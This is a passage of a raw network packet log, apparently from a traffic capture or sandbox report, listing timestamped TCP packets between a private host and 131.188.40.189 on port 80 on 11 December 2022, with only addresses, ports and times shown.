                          Dec 11, 2022 09:25:54.054796934 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054838896 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054908991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054953098 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054987907 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054995060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055038929 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055083036 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055114031 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055125952 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055169106 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055203915 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055212975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055254936 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055290937 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055298090 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055342913 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055377007 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055387020 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055430889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055459976 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055474997 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055516958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055543900 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055560112 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055602074 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055629969 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055644035 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055686951 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055715084 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055728912 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055772066 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055804014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055814028 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055857897 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055886984 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055901051 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055943012 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.055973053 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.055985928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056029081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056056976 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056073904 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056117058 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056148052 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056160927 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056204081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056230068 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056247950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056288958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056319952 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056330919 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056374073 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056401014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056416988 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056459904 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056490898 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056503057 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056545973 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056567907 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056605101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056644917 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056688070 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056732893 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056745052 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056787014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056821108 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056854963 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056896925 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056924105 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056941032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.056952953 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.056986094 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057005882 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057028055 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057071924 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057115078 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057156086 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057180882 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057199001 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057240963 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057282925 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057306051 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057327032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057354927 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057368994 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057410955 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057451963 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057492018 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057517052 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057535887 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057576895 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057620049 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057641029 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057662010 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057687044 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057703972 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057748079 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057790041 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057811022 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057831049 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057842016 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.057873964 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057915926 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057956934 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.057974100 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058003902 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058047056 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058088064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058105946 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058130026 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058171988 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058212042 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058231115 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058253050 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058295965 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058310986 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058339119 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058379889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058396101 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058422089 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058463097 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058476925 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058506012 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058548927 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058561087 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058592081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058634043 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058654070 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058676958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058718920 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.058733940 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.058936119 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.078671932 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.078771114 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.079550028 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.079598904 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.079643011 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.079679966 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.079689026 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.079720974 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.079746962 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.080394030 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.080440044 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.080471992 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.080482960 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.080517054 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.080837011 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.099189997 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.099451065 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.099479914 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.099524975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.099539042 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.099627972 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.099627972 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.100007057 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.100871086 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.100915909 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.100959063 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.101001024 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.101010084 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.101044893 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.101049900 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.101069927 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.101093054 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.101161957 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.119596958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119661093 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119705915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119730949 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.119749069 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119776964 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.119776964 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.119792938 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119838953 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119848967 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.119880915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.119950056 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.120892048 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.120939970 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.120984077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121005058 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.121027946 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121062040 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.121083975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121107101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121125937 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.121153116 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121161938 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.121197939 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121241093 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121257067 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.121285915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121330023 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.121346951 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.121506929 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.139949083 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.140075922 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.384916067 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.385041952 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.856865883 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.857249022 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.922132015 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942106962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942142010 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942193031 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942222118 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942226887 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942262888 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942305088 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942338943 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942338943 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942372084 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942372084 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942405939 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942425966 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942439079 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942472935 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942500114 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942504883 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942538023 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942579985 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942600965 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.942612886 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.942645073 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.962474108 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962516069 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962564945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962599039 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962634087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962634087 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.962668896 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962694883 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.962704897 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962726116 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.962738991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962774038 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962816954 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962840080 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.962850094 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962917089 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962954998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962989092 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.962996006 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.963035107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963043928 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.963057041 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963077068 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963095903 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963114023 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.963124990 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963145971 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963171005 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963191032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963215113 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.963217020 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963237047 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963262081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963280916 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963305950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963320017 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.963325977 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.963376045 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.963401079 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983403921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983444929 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983474016 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983477116 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983503103 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983532906 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983541012 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983563900 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983591080 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983624935 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983635902 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983659029 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983665943 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983695030 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983731031 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983761072 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983771086 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983789921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983802080 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983822107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983850956 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983856916 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983880997 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983908892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983918905 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983938932 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983968973 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.983972073 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.983999968 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984028101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984036922 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984056950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984086990 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984116077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984116077 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984143972 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984168053 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984172106 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984200001 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984217882 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984241009 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984266043 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984268904 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984297991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984334946 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984359026 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984364033 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984392881 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984414101 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984426022 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984455109 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984477043 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984483957 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984513998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984527111 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984541893 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984576941 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984606028 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984608889 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984636068 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984657049 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984668016 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984697104 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984709024 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984724998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984761953 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984790087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984824896 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984831095 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984853983 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984869957 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984885931 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984900951 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984914064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984941959 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.984949112 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.984971046 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985008955 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985038042 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985053062 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.985065937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985086918 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.985102892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985131979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985136032 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.985162020 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.985198021 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005122900 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005193949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005215883 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005229950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005266905 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005299091 CET8049719131.188.40.189192.168.2.3
